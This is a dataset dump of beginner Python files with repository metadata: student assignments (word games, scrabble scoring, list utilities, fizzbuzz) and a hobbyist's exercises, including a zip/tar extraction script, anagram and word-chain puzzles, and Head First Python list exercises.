"text": "def canMakeWord(letters,word):\n count = 0\n i=0\n while i <= len(word) -1:\n if word[i] in letters:\n count += 1\n letters[letters.find(word[i])]==''\n i +=1\n if count == len(word):\n return True\n else:\n return False\n\nprint(canMakeWord(\"ladilmy\",\"daily\"))\nprint(canMakeWord(\"eerriin\",\"eerie\"))\nprint(canMakeWord(\"nope\",\"okay\"))\nprint(canMakeWord(\"wrong\",\"right\"))\n\ndef withWild(letters,word):\n count = 0\n i=0\n while i <= len(word)-1:\n if word[i] in letters:\n count += 1\n letters[letters.find(word[i])]==''\n\n if (word[i] not in letters) and ('?' in letters):\n letters[letters.find('?')]==''\n count += 1\n\n i+=1\n\n if count == len(word):\n return True\n else:\n return False\n\nprint(withWild(\"?????\",\"daily\"))\nprint(withWild(\"?utchg\",\"gotchu\"))\nprint(withWild(\"?utch?\",\"gotchu\"))\nprint(withWild(\"luck\",\"okay\"))\n"
},
{
"alpha_fraction": 0.5202702879905701,
"alphanum_fraction": 0.6013513803482056,
"avg_line_length": 20.14285659790039,
"blob_id": "326ac832f50d72f0788aa3e3abfdd4ad11993bd6",
"content_id": "c72c06024a3bb736c808f7e21a367ca4a5432835",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 148,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 7,
"path": "/exam_01/cake.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def divide(A,B,u):\n People=1/(A/B)\n if People<1 and People!=0:\n People=1\n return People\nprint(divide(5,10,1))\nprint(divide(15,5,1))\n"
},
{
"alpha_fraction": 0.43412160873413086,
"alphanum_fraction": 0.45270270109176636,
"avg_line_length": 24.7391300201416,
"blob_id": "1546efa54668874533d72a2374b5952eb3782658",
"content_id": "0cff42d6368bf2ee7b6d6837e75b0c00fd709a86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 592,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 23,
"path": "/exam_02/scrabble.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def score(w):\n score = 0\n i = 0\n while i < len(w):\n if w[i] in \"aeioulnrstAEIOULNRST\":\n score = score + 1\n if w[i] in \"dgDG\":\n score = score + 2\n if w[i] in \"bcmpBCMP\":\n score = score + 3\n if w[i] in \"fhvwyFHVWY\":\n score = score + 4\n if w[i] in \"kK\":\n score = score + 5\n if w[i] in \"jxJX\":\n score = score + 8\n if w[i] in \"qzQZ\":\n score = score + 10\n i +=1\n return score\nprint(score(\"hello\"))\nprint(score(\"Okaayyayjhk\"))\nprint(score(\"ZZZZABEIss\"))\n"
},
{
"alpha_fraction": 0.4262443482875824,
"alphanum_fraction": 0.4361990988254547,
"avg_line_length": 18.034482955932617,
"blob_id": "257fefa90c69877c5c2a6dea1d6cb4014383681e",
"content_id": "f784d19d0768e55afa001578783de637c8cfce3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1105,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 58,
"path": "/hw_07/lady.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def happy_ladybugs(L):\n if '_' in L:\n L = L.replace('_','')\n \n repetition = {}\n \n for i in L:\n repetition.setdefault(i,0)\n repetition[i] += 1\n \n for i in repetition.values():\n if i < 2:\n return 'NO'\n \n return 'YES'\n\n elif Full(L):\n return 'YES'\n \n else:\n return 'NO'\n \n \ndef Full(L): \n \n previous = L[0]\n consecutive = 1\n if len(L) == 1:\n return False\n \n for i in range(1,len(L)):\n if L[i] == previous:\n consecutive += 1\n elif consecutive > 1:\n if i == len(L) -1:\n return False\n previous = L[i]\n consecutive = 1\n else:\n return False\n return True\n\n\ndef uniqueitems(l):\n \n unique = []\n for i in l: \n if i not in unique:\n unique.append(i)\n \n return unique\n\n\ngames = ['CBAABC','CCAABB','BBBBBB','_','A_B_AA','LFGG','ALACABAZLE',\n 'SS_____SSAA_MMM']\n\nfor each in games:\n print(each,' ',happy_ladybugs(each)) \n"
},
{
"alpha_fraction": 0.5161895751953125,
"alphanum_fraction": 0.5499765276908875,
"avg_line_length": 22.19780158996582,
"blob_id": "49e0cfd79c9f5d3f44c0dabe89351bb9dda57941",
"content_id": "bca0a766f4438a64737dc2b40ee13389832597f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2131,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 91,
"path": "/hw_04/lists.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#Eric Dittus\nimport random\n\ndef build_random_list(size,max_value):\n \"\"\"\n Parameters:\n size : the number of elements in the lsit\n max_value : the max random value to put in the list\n \"\"\"\n l = [] # start with an empty list\n\n # make a loop that counts up to size\n i = 0\n while i < size:\n l.append(random.randrange(0,max_value))\n # we could have written this instead of the above line:\n # l = l + [random.randrange(0,max_value)]\n i = i + 1\n return l\nprint(build_random_list(5,100))\n\ndef locate(l,value):\n# i=0\n# found_index = -1\n# while i < len(l):\n# print(value,i,l[i])\n# if l[i] == value:\n# found_index = i\n# break\n# i += 1\n# return found_index\n if value in l:\n return l.index(value)\n else:\n return -1\nprint(locate([5,7,8,9,4,6],8))\n\n\ndef count(l,value):\n i=0\n count_value=0\n while i< len(l):\n if l[i]==value:\n count_value += 1\n i += 1\n return count_value\nprint(count([1,1,1,1,2,5,7],1))\n\ndef reverse(l):\n l_new=[]\n i=len(l)-1\n while i>=0:\n l_new.append(l[i])\n i-=1\n return l_new\nprint(reverse([1,2,3,4,5,6]))\n\ndef isIncreasing(l):\n i=0\n less_than_counter=0\n #This will count how many times the previous value is\n #less than the one after it. If the correct\n #amount is met, this program will return true\n while i<=len(l)-2:\n if l[i]<l[i+1]:\n less_than_counter+=1\n else:\n return False\n i+=1\n if less_than_counter==len(l)-1:\n return True\nprint(isIncreasing([1,3,5,6,8,10]))\nprint(isIncreasing([4,3,6,3]))\n \ndef palindrome(l):\n index=0\n mirror_index=-1\n pal_check=0\n while index<= len(l)/2: #should work for odd and even lengths\n if l[index]==l[mirror_index]:\n pal_check+=1\n else:\n return False\n index+=1\n mirror_index-=1\n if (len(l)%2 is 0) and pal_check==len(l)/2:\n return True\n elif (len(l)%2 is not 0) and (pal_check>(len(l)/2-1)):\n return True\nprint(palindrome('eve'))\nprint(palindrome('thaht'))\n\n\n \n \n"
},
{
"alpha_fraction": 0.4723076820373535,
"alphanum_fraction": 0.5061538219451904,
"avg_line_length": 24,
"blob_id": "2f9242a77712e93bd0c3c878c318683d408636ee",
"content_id": "381ce71abb24759aef921e70f6b5a3d225159a15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 650,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 26,
"path": "/hw_03/sqrt.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "import random\n#could not figure it out, but found this online\n#def mysqrt(x):\n# epsilon = 0.01\n# left= 0\n# right = x\n# guess = (right+left)/2.0\n# while abs(guess**2 - x) > epsilon:\n# if guess**2 < x:\n# left = guess\n# else:\n# right = guess\n# guess = (right+left)/2.0\n# print (guess)\ndef mysqrt(square):\n output=0\n guess=0\n i=0\n if ((square - output*output)/100) > 0.01:\n while square != output*output:\n guess = random.randint(1,square)\n output = (guess + (square/guess))/2\n print (output)\n i = i + 1\n \n return output\n"
},
{
"alpha_fraction": 0.4000000059604645,
"alphanum_fraction": 0.4000000059604645,
"avg_line_length": 9,
"blob_id": "40d12a81e7a2bf5dda0d778486baf0b930bffab6",
"content_id": "b3f7898ca8c6980794edce7071ccca093dd2a090",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10,
"license_type": "no_license",
"max_line_length": 9,
"num_lines": 1,
"path": "/hw_04/README.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "## Eric Dittus\n"
},
{
"alpha_fraction": 0.5346359014511108,
"alphanum_fraction": 0.5559502840042114,
"avg_line_length": 16.59375,
"blob_id": "c9ede81a22d7b07d6cb320c77e5cb01017c79548",
"content_id": "6c513fa269bec7e413d1e8dadf80660a9ccf8d1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 563,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 32,
"path": "/hw_06/stats.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "'''\nCreated by SAM EBERSOLE and ERIC DITTUS\n'''\n\n\nimport random\n\ndef create_random_list():\n i = 0\n list = []\n while i <= 100:\n list.append(random.randint(0,10))\n i += 1\n return list\n \ndef find_largest (list):\n largest = 0\n for item in list:\n if item > largest:\n largest = item\n return largest\n\ndef count_occurance (num, list):\n count = 0\n for item in list:\n if item == num:\n count += 1\n return count\n\nlist = create_random_list()\nprint(find_largest(list))\nprint(count_occurance(6, list))\n"
},
{
"alpha_fraction": 0.304964542388916,
"alphanum_fraction": 0.32860520482063293,
"avg_line_length": 17.636363983154297,
"blob_id": "ca4b9f00f9d1933908b4e82c57ff8d479774f9ae",
"content_id": "90d4674bc169d575cb75e6b3c46d11af02507fd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 423,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 22,
"path": "/lab_02/fizzbuzz.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#Eric Dittus and Shanjida Kamal\ndef fizzbuzz(max_value):\n i = 1\n count = 0\n while i <= max_value:\n\n\n if (i % 5 ==0):\n if (i % 3 ==0):\n print (\"FizzBuzz\")\n count == count + 1\n else:\n print ( \"Buzz\")\n elif (i % 3==0):\n print (\"Fizz\")\n \n \n else:\n print (i)\n i=i+1\n \n return count\n \n"
}
] | 31 |
cansley/PythonProjects
|
https://github.com/cansley/PythonProjects
|
9b087a83736fd5fa91cb242205f1147235cbc9b5
|
ba8ccff6f119f13cf927ae32cd4a95070111053d
|
72f80bd49145a864eb1cf2b87c9dd1b8bfdc5e04
|
refs/heads/master
| 2022-11-03T06:23:42.073216 | 2014-10-19T23:57:26 | 2014-10-19T23:57:26 | 25,443,458 | 0 | 1 | null | 2014-10-19T23:33:03 | 2014-10-19T23:39:55 | 2014-10-19T23:57:35 |
Python
|
[
{
"alpha_fraction": 0.5953307151794434,
"alphanum_fraction": 0.6070038676261902,
"avg_line_length": 20.41666603088379,
"blob_id": "6b3bcc249a7d527a04b5d7d8ab972ef109666117",
"content_id": "f83f15257671b2f695831fed26f14d882a5fff95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 257,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/HeadFirstPython/setup.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "from distutils.core import setup\n\nsetup(\n name='HeadFirstPython',\n version='.09',\n packages=['Ch1'],\n url='http://www.google.com',\n license='',\n author='Charles Ansley',\n author_email='[email protected]',\n description='Some dumb stuff. DO NOT USE!'\n)\n"
},
{
"alpha_fraction": 0.6133642196655273,
"alphanum_fraction": 0.6230204701423645,
"avg_line_length": 26.25789451599121,
"blob_id": "144929d0b9de372b445b2ccc55473b208bd98a92",
"content_id": "1170e98196ee9ca761b9357629d3159ae1954d99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5178,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 190,
"path": "/PythonChallenges/pyZip.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "\"\"\"\nzip2folder.py by Dirk Krause, [email protected], 12/27/2001\n\nAbstract: A poor man's WinZip\n\nThis program does the three essential tasks that (at least) I need:\n1. Unzip an archive to a folder\n2. Zip a folder to an archive\n3. Zip a (big) file to an archive\n\nFor convenient usage, get Gordon McMillan's Installer Package, and freeze this application with\n> python freeze.py zip2folder.py\nAfter that, you will have a self containing EXE that works even without having python installed.\nDrop this thing into the 'sendto' folder, and you have a very convenient way to use this program\nvia right mouseclick/sendto zip2folder.\n\"\"\"\n\nimport tarfile\nimport zipfile\nimport sys\nimport os\nimport string\n\n\nargument = ''\nif len(sys.argv) > 1:\n argument = sys.argv[1]\nelse:\n print('No argument!')\n\n# argument = r'C:\\Users\\cxa70\\Downloads\\Django-1.6.2.tar.gz'\n\n\nMODE_IS_UNKNOWN = 0\nMODE_IS_FILE = 1\nMODE_IS_ZIPFILE = 2\nMODE_IS_DIRECTORY = 3\nMODE_IS_TAR = 4\n\nclass RecursiveFileIterator:\n # Great script from Daniel Dittmar,\n # http://www.faqts.com/knowledge-base/view.phtml/aid/6000\n def __init__(self, *rootDirs):\n self.dirQueue = list(rootDirs)\n self.includeDirs = None\n self.fileQueue = []\n\n def __getitem__(self, index):\n while len(self.fileQueue) == 0:\n self.nextDir()\n result = self.fileQueue[0]\n del self.fileQueue[0]\n return result\n\n def nextDir(self):\n dir = self.dirQueue[0] # fails with IndexError, which is fine\n # for iterator interface\n del self.dirQueue[0]\n list = os.listdir(dir)\n join = os.path.join\n isdir = os.path.isdir\n for basename in list:\n fullPath = join(dir, basename)\n if isdir(fullPath):\n self.dirQueue.append(fullPath)\n if self.includeDirs:\n self.fileQueue.append(fullPath)\n else:\n self.fileQueue.append(fullPath)\n\n\ndoit = 0\ndo_mode = MODE_IS_UNKNOWN\n\nif os.path.isfile(argument):\n if os.path.splitext(argument)[1].lower() == '.zip':\n do_mode = MODE_IS_ZIPFILE\n elif os.path.splitext(argument)[1].lower() == '.tar':\n do_mode = MODE_IS_TAR\n elif os.path.splitext(argument)[1].lower() == '.gz':\n do_mode = MODE_IS_TAR\n else:\n do_mode = MODE_IS_FILE\nelse:\n do_mode = MODE_IS_UNKNOWN\n\nif os.path.isdir(argument):\n do_mode = MODE_IS_DIRECTORY\n\nif do_mode == MODE_IS_FILE:\n print('converting file %s to zip?' % argument)\n\nif do_mode == MODE_IS_ZIPFILE:\n print('converting zipfile %s to folder?' % argument)\n\nif do_mode == MODE_IS_DIRECTORY:\n print('converting directory %s to zipfile?' % argument)\n\nif do_mode == MODE_IS_TAR:\n print('converting tarfile %s to folder?' % argument)\n\nif do_mode in (MODE_IS_FILE, MODE_IS_ZIPFILE, MODE_IS_DIRECTORY, MODE_IS_TAR):\n # comment the following line to not have to confirm\n if input('[y/n]')[0] in 'yY':\n doit = -1\n\nif do_mode == MODE_IS_UNKNOWN:\n print('%s is not a file.' 
% argument)\n\nif doit == -1:\n print('ok, doing it.')\nelse:\n print('exiting.')\n\nif doit == -1 and do_mode == MODE_IS_ZIPFILE:\n zipfilename = argument\n\n zipdir = os.path.splitext(zipfilename)[0] + '/'\n\n # if you want the folder to be cleared before unzipping,\n # uncomment the following lines:\n\n #try:\n # shutil.rmtree(zipdir)\n # print 'Deleted',zipdir\n #except: pass\n\n\n zipdir = os.path.splitext(zipfilename)[0] + '/'\n\n file = zipfile.ZipFile(zipfilename, \"r\")\n print\n 'Number of files', len(file.infolist())\n for zfile in file.infolist():\n #print '--------------File:',\n #print zfile.filename, zfile.date_time, zfile.file_size, zfile.compress_size\n dirname = zipdir + os.path.dirname(zfile.filename)\n\n try:\n os.makedirs(dirname)\n except:\n pass\n\n if zfile.file_size > 0:\n temp = file.read(zfile.filename)\n # print temp\n fname = zipdir + zfile.filename\n print\n fname\n f = open(fname, \"wb\").write(temp)\n\nif doit == -1 and do_mode == MODE_IS_TAR:\n tarFileName = argument\n\n tarDir = os.path.splitext(tarFileName)[0] + '/'\n\n # if you want the folder to be cleared before unzipping,\n # uncomment the following lines:\n\n #try:\n # shutil.rmtree(zipdir)\n # print 'Deleted',zipdir\n #except: pass\n\n with tarfile.open(tarFileName, \"r\") as tar:\n tar.extractall(tarDir)\n\nif doit == -1 and do_mode == MODE_IS_DIRECTORY:\n directory = argument\n\n print\n 'directory', os.path.abspath(directory)\n\n file = zipfile.ZipFile(os.path.abspath(directory) + \".zip\", \"w\")\n\n for name in RecursiveFileIterator(directory):\n print\n 'try', name\n if os.path.isfile(name):\n file.write(name, name, zipfile.ZIP_DEFLATED)\n\n file.close()\n\nif doit == -1 and do_mode == MODE_IS_FILE:\n file = zipfile.ZipFile(os.path.abspath(argument) + \".zip\", \"w\")\n file.write(argument, argument, zipfile.ZIP_DEFLATED)\n file.close()\n\n# comment the following line to have the dos box disappear immediately\ninp = input('<... press the anykey key.>')"
},
{
"alpha_fraction": 0.6434856653213501,
"alphanum_fraction": 0.6498932242393494,
"avg_line_length": 40.36042404174805,
"blob_id": "f6a6f1afec8a0ca94fbce25d04df6b1f741b0136",
"content_id": "2f9a8268ee5c07d85865ff0714f28abc609a0469",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11705,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 283,
"path": "/PythonExercises/harder.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "import re\nfrom pprint import pprint as pp\nimport random\n\n# A sentence splitter is a program capable of splitting a text into sentences. The standard set of heuristics for\n# sentence splitting includes (but isn't limited to) the following rules:\n#\n# Sentence boundaries occur at one of \".\" (periods), \"?\" or \"!\", except that\n#\n# Periods followed by whitespace followed by a lower case letter are not sentence boundaries.\n# Periods followed by a digit with no intervening whitespace are not sentence boundaries.\n# Periods followed by whitespace and then an upper case letter, but preceded by any of a short list of titles are not\n# sentence boundaries. Sample titles include Mr., Mrs., Dr., and so on.\n# Periods internal to a sequence of letters with no adjacent whitespace are not sentence boundaries (for example,\n# www.aptex.com, or e.g).\n# Periods followed by certain kinds of punctuation (notably comma and more periods) are probably not sentence boundaries\n# .\n# Your task here is to write a program that given the name of a text file is able to write its content with each\n# sentence on a separate line. Test your program with the following short text:\n# Mr. Smith bought cheapsite.com for 1.5 million dollars, i.e. he paid a lot for it. Did he mind? Adam Jones Jr. thinks\n# he didn't. In any case, this isn't true... Well, with a probability of .9 it isn't.\n#\n# The result should be:\n#\n# Mr. Smith bought cheapsite.com for 1.5 million dollars, i.e. he paid a lot for it.\n# Did he mind?\n# Adam Jones Jr. thinks he didn't.\n# In any case, this isn't true...\n# Well, with a probability of .9 it isn't.\ndef text_splitter(file_path, file_content):\n file_content = str(file_content)\n digits = range(0, 9)\n titles = [\"Mr.\", \"Ms.\", \"Mrs.\", \"Jr.\", \"Dr.\"]\n consenants = re.compile(\"[a-z]\", re.IGNORECASE)\n line_break_idx = []\n segments = []\n idx = 0\n while idx != -1:\n idx = file_content.find(\"?\", idx + 1)\n if idx != -1:\n line_break_idx.append(idx)\n\n idx = 0\n while idx != -1:\n idx = file_content.find(\"!\", idx + 1)\n if idx != -1:\n line_break_idx.append(idx)\n\n idx = 0\n while idx != -1:\n idx = file_content.find(\".\", idx + 1)\n if idx != -1:\n if idx == len(file_content) - 1:\n idx = -1\n continue\n if file_content[idx - 2: idx + 1] in titles or file_content[idx - 3:idx + 1] in titles:\n continue\n if (file_content[idx - 1] in digits or file_content[idx - 1] == \" \") and file_content[idx + 1] in digits:\n continue\n if consenants.match(file_content[idx - 1]) and file_content[idx - 2] == \".\":\n continue\n if file_content[idx + 1] == \" \" and consenants.match(file_content[idx + 2]):\n line_break_idx.append(idx)\n last_idx = 0\n for x in sorted(line_break_idx):\n segments.append((last_idx, x + 2))\n last_idx = x + 2\n\n with open(file_path, \"w+\") as f:\n for x in segments:\n f.write(file_content[x[0]: x[1]] + \"\\n\")\n f.write(file_content[last_idx:])\n\n\n# An anagram is a type of word play, the result of rearranging the letters of a word or phrase to produce a new word or\n# phrase, using all the original letters exactly once; e.g., orchestra = carthorse. 
Using the word list at\n# http://www.puzzlers.org/pub/wordlists/unixdict.txt, write a program that finds the sets of words that share the same\n# characters that contain the most words in them.\nclass dictionary_word(object):\n def __init__(self):\n self.Value = \"\"\n self.Length = 0\n self.CharList = []\n\n def populate(self, source: str):\n self.Value = source\n self.Length = len(source)\n self.CharList = sorted(source)\n return self\n\n def isAnagram(self, comparator):\n return self.Length == comparator.Length and self.Value != comparator.Value and self.CharList == comparator.CharList\n\n\ndef find_anagrams(word_list_file):\n master_word_list = []\n with open(word_list_file) as f:\n for line in f:\n newWord = dictionary_word().populate(line.replace(\"\\n\", \"\").lower())\n master_word_list.append(newWord)\n # master_word_list = list(map(lambda x: dictionary_word().populate(x.replace(\"\\n\", \"\").lower()), f))\n\n master_anagram_list = []\n while len(master_word_list) > 0:\n word = master_word_list.pop()\n anagram_list = [word.Value]\n filter_list = list(\n filter(lambda n: word.Length == n.Length and word.Value != n.Value and word.CharList == n.CharList,\n master_word_list))\n anagram_list.extend(map(lambda z: z.Value, filter_list))\n for zed in filter_list:\n if zed in master_word_list:\n master_word_list.remove(zed)\n master_anagram_list.append(anagram_list)\n master_anagram_list = sorted(master_anagram_list, key=len)\n max_len = len(master_anagram_list[-1])\n pp(list(filter(lambda x: len(x) == max_len, master_anagram_list)))\n\n\n# Your task in this exercise is as follows:\n#\n# Generate a string with N opening brackets (\"[\") and N closing brackets (\"]\"), in some arbitrary order.\n# Determine whether the generated string is balanced; that is, whether it consists entirely of pairs of opening/closing\n# brackets (in that order), none of which mis-nest.\n# Examples:\n#\n# [] OK ][ NOT OK\n# [][] OK ][][ NOT OK\n# [[][]] OK []][[] NOT OK\ndef bracket_string_generator(bracket_count):\n ret_string = \"\"\n bracket_array = [\"[\", \"]\"]\n for i in range(0, bracket_count):\n rnd_num = random.randint(1, 10000) % 2\n ret_string += bracket_array[rnd_num]\n return ret_string\n\n\ndef bracket_string_analyser(string_to_eval):\n pp(\"Analysing string: \" + string_to_eval)\n is_balanced = True\n bal_count = 0\n for c in string_to_eval:\n if c == \"[\":\n bal_count += 1\n if c == \"]\":\n bal_count -= 1\n if bal_count < 0:\n is_balanced = False\n break\n is_balanced = bal_count == 0\n pp(\"String is balanced? \" + str(is_balanced))\n\n\n#A certain childrens game involves starting with a word in a particular category. Each participant in turn says a word,\n# but that word must begin with the final letter of the previous word. Once a word has been given, it cannot be repeated\n# . If an opponent cannot give a word in the category, they fall out of the game. For example, with \"animals\" as the\n# category,\n#\n# Child 1: dog\n# Child 2: goldfish\n# Child 1: hippopotamus\n# Child 2: snake\n# ...\n# Your task in this exercise is as follows: Take the following selection of 70 English Pokemon names (extracted from\n# Wikipedia's list of Pokemon) and generate the/a sequence with the highest possible number of Pokemon names where the\n# subsequent name starts with the final letter of the preceding name. 
No Pokemon name is to be repeated.\n#\n# audino bagon baltoy banette bidoof braviary bronzor carracosta charmeleon\n# cresselia croagunk darmanitan deino emboar emolga exeggcute gabite\n# girafarig gulpin haxorus heatmor heatran ivysaur jellicent jumpluff kangaskhan\n# kricketune landorus ledyba loudred lumineon lunatone machamp magnezone mamoswine\n# nosepass petilil pidgeotto pikachu pinsir poliwrath poochyena porygon2\n# porygonz registeel relicanth remoraid rufflet sableye scolipede scrafty seaking\n# sealeo silcoon simisear snivy snorlax spoink starly tirtouga trapinch treecko\n# tyrogue vigoroth vulpix wailord wartortle whismur wingull yamask\ndef build_list(string_to_parse):\n return list(str(string_to_parse).split())\n\n\ndef add_to_dict(value_to_add, dict):\n dict.setdefault(value_to_add, 0)\n dict[value_to_add] += 1\n\n\ndef word_starts_with(letter, word_list):\n return list(filter(lambda x: x[0] == letter, word_list))\n\n\ndef word_ends_with(letter, word_list):\n return list(filter(lambda x: x[-1] == letter, word_list))\n\n\ndef sort_list_by_freq(freq_list, target_list):\n cross_sorted_list = []\n for l in freq_list:\n x = word_ends_with(l, target_list)\n cross_sorted_list.extend(x)\n for z in x:\n target_list.remove(z)\n for z in target_list:\n cross_sorted_list.append(z)\n return cross_sorted_list\n\n\ndef build_sub_list(current_word, master_list):\n max_list, series = [], []\n series.append(current_word)\n work_list = master_list[:]\n if current_word in work_list:\n work_list.remove(current_word)\n inner_list = word_starts_with(current_word[-1], work_list)\n for w in inner_list:\n series.extend(build_sub_list(w, work_list))\n if len(series) > len(max_list):\n max_list = series[:]\n series = [current_word]\n if len(series) > len(max_list): # this needs to be here to catch items with no inner_list results\n max_list = series[:]\n return max_list\n\n\ndef words_domino():\n word_list = build_list(\n \"audino bagon baltoy banette bidoof braviary bronzor carracosta charmeleon cresselia croagunk\"\n \" darmanitan deino emboar emolga exeggcute gabite girafarig gulpin haxorus heatmor heatran\"\n \" ivysaur jellicent jumpluff kangaskhan kricketune landorus ledyba loudred lumineon lunatone\"\n \" machamp magnezone mamoswine nosepass petilil pidgeotto pikachu pinsir poliwrath poochyena\"\n \" porygon2 porygonz registeel relicanth remoraid rufflet sableye scolipede scrafty \"\n \" sealeo silcoon simisear snivy snorlax spoink starly tirtouga trapinch treecko tyrogue\"\n \" vigoroth vulpix wailord wartortle whismur wingull yamask\")\n\n max_list, series = [], []\n for word in word_list:\n current_word = word\n work_list = word_list[:]\n work_list.remove(current_word)\n series = build_sub_list(current_word, work_list)\n if len(series) > len(max_list):\n max_list = series[:]\n\n pp(max_list)\n\n\n#An alternade is a word in which its letters, taken alternatively in a strict sequence, and used in the same order as\n# the original word, make up at least two other words. All letters must be used, but the smaller words are not\n# necessarily of the same length. For example, a word with seven letters where every second letter is used will produce\n# a four-letter word and a three-letter word. Here are two examples:\n#\n# \"board\": makes \"bad\" and \"or\".\n# \"waists\": makes \"wit\" and \"ass\".\n# Using the word list at http://www.puzzlers.org/pub/wordlists/unixdict.txt, write a program that goes through each word\n# in the list and tries to make two smaller words using every second letter. 
The smaller words must also be members of\n# the list. Print the words to the screen in the above fashion.\ndef get_even_odd_words(word, starting_pos, lookup_list):\n output = \"\"\n for x in range(starting_pos, len(word), 2):\n output += word[x]\n\n if len(output) >= 2 and output in lookup_list:\n return output\n else:\n return \"\"\n\n\ndef find_alternades():\n with open('unixdict.txt', mode='r') as file:\n word_list = []\n for line in file:\n word_list.append(line.replace('\\n', ''))\n\n for word in word_list:\n odd_letters = get_even_odd_words(word, 1, word_list)\n even_letters = get_even_odd_words(word, 0, word_list)\n\n if len(even_letters) > 0 or len(odd_letters) > 0:\n if len(even_letters) == 0:\n message = '\"%s\": makes \"%s\".' % (word, odd_letters)\n elif len(odd_letters) == 0:\n message = '\"%s\": makes \"%s\".' % (word, even_letters)\n else:\n message = '\"%s\": makes \"%s\" and \"%s\".' % (word, even_letters, odd_letters)\n pp(message)\n"
},
{
"alpha_fraction": 0.5876288414001465,
"alphanum_fraction": 0.5935198664665222,
"avg_line_length": 23.25,
"blob_id": "533c712813e98d7e526cabb38a6c3f384dd54d5d",
"content_id": "2e1c285e66a8208a0f8e817d22381f89665f603e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 679,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 28,
"path": "/MyFirstPython/words.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "\"\"\"Module Level Documentation\n\nUsage:\n How to use this...\n\n\"\"\"\n__author__ = 'cxa70'\n\nfrom urllib.request import urlopen\n\ndef fetch_words():\n '''Retrieves a list of words from a URL.\n\n Args:\n url: The URL of a UTF-8 text document.\n\n Returns:\n A list of strings containing the words from the document.\n '''\n with urlopen('http://sixty-north.com/c/t.txt') as story:\n story_words = []\n for line in story:\n line_words = line.decode('utf-8').split()\n for word in line_words:\n story_words.append(word)\n\n for word in story_words:\n print(word) # This is a line comment...use these sparingly...\n"
},
{
"alpha_fraction": 0.5850515365600586,
"alphanum_fraction": 0.6092783212661743,
"avg_line_length": 28.409090042114258,
"blob_id": "192c307df92d7f22bd776e05785cea4f3e07f1ba",
"content_id": "644ebd0e387ee2a1c53191dbfbd58a3452793301",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1940,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 66,
"path": "/HeadFirstPython/Ch1/Ch1.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nmovies = [\"The Holy Grail\", \"The Life of Brian\", \"The Meaning of Life\"]\n\n#exercise 1\n# this is really beyond what the book called for.\n# the book was just looking for movies.insert(1, 1975), etc.\ndef upsert_year(movie_title, year, movie_collection):\n return_coll = movie_collection[:]\n if movie_title in return_coll:\n title_idx = return_coll.index(movie_title)\n else:\n return_coll.append(movie_title)\n title_idx = return_coll.index(movie_title)\n\n if title_idx+1 < len(return_coll):\n test_val = return_coll[title_idx+1]\n else:\n test_val = None\n\n if isinstance(test_val, int):\n if title_idx+1 >= len(return_coll):\n return_coll.append(year)\n else:\n return_coll[title_idx+1] = year\n else:\n return_coll.insert(title_idx+1, year)\n return return_coll\n\n\n#exercise 2\ndef create_list():\n return [\"The Holy Grail\", 1975, \"The Life of Brian\", 1979, \"The Meaning of Life\", 1983]\n\n\ndef create_complex_list():\n return [\"The Holy Grail\", 1975, \"Terry Jones & Terry Gilliam\", 91, [\"Graham Chapman\", [\"Michael Palin\", \"John Cleese\", \"Terry Gilliam\", \"Eric Idle\", \"Terry Jones\"]]]\n\n\ndef print_list(indent_string, val_list):\n currentList = list(val_list)\n for val in currentList:\n if isinstance(val, list):\n print_list(indent_string*2, val)\n else:\n print(indent_string, val)\n\n\ndef main():\n newMovies = upsert_year(\"The Holy Grail\", 1975, movies)\n newMovies = upsert_year(\"The Life of Brian\", 1979, newMovies)\n newMovies = upsert_year(\"The Meaning of Life\", 1983, newMovies)\n print(newMovies)\n\n newMovies = create_list()\n count = 0\n while count < len(newMovies):\n print(newMovies[count])\n count += 2\n\n newMovies 